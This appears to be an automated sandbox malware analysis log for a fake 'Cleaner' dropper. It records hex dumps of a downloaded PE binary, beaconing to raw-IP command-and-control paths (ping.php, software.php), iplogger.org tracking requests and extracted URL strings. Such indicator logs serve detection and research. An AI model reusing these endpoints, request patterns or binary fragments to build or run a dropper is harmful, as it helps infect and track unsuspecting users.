00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:42:20 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2

Source: global traffic

HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167

Source: file.exe, 00000000.00000000.265432136.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.284845815.000000000068C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN
Source: Cleaner.exe, 0000001E.00000002.642881680.0000022E6D105000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Cleaner.exe, 0000001E.00000002.635678816.0000022E00418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://iplogger.org
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.361078584.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: Cleaner.exe, 0000001E.00000003.361219972.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Cleaner.exe, 0000001E.00000003.365381080.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365415203.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.365464280.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364887394.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com.
Source: Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Cleaner.exe, 0000001E.00000003.364266164.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Cleaner.exe, 0000001E.00000003.366066171.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Cleaner.exe, 0000001E.00000003.366036453.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlll.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Cleaner.exe, 0000001E.00000003.372842971.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersiva
Source: Cleaner.exe, 0000001E.00000003.366231899.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comF.
Source: Cleaner.exe, 0000001E.00000003.364960603.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comH
Source: Cleaner.exe, 0000001E.00000003.364938213.0000022E6B03F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comitu8
Source: Cleaner.exe, 0000001E.00000003.364466049.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.364386372.0000022E6B02F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comvaRegular
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Cleaner.exe, 0000001E.00000003.360298044.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn8
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/F.
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/H
Source: Cleaner.exe, 0000001E.00000003.362097359.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Cleaner.exe, 0000001E.00000003.361876984.0000022E6B030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Cleaner.exe, 0000001E.00000003.357923180.0000022E6B025000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comb.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Cleaner.exe, 0000001E.00000003.362419891.0000022E6B026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comx
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Cleaner.exe, 0000001E.00000003.359574972.0000022E6B03B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kralRegular
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358211225.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000003.358174176.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.net.
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netF.
Source: Cleaner.exe, 0000001E.00000003.358138566.0000022E6B040000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netTTF.
Source: Cleaner.exe, 0000001E.00000003.367409088.0000022E6B05D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Cleaner.exe, 0000001E.00000002.639323472.0000022E6C2E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.
Source: Cleaner.exe, 0000001E.00000003.360922906.0000022E6B03E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.X
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: https://g-cleanit.hk
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org
Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.298651598.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.dr	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: Cleaner.exe, 0000001E.00000002.635650155.0000022E0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.orgx
Source: Cleaner.exe, 0000001E.00000002.631260958.0000022E00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: global traffic	HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
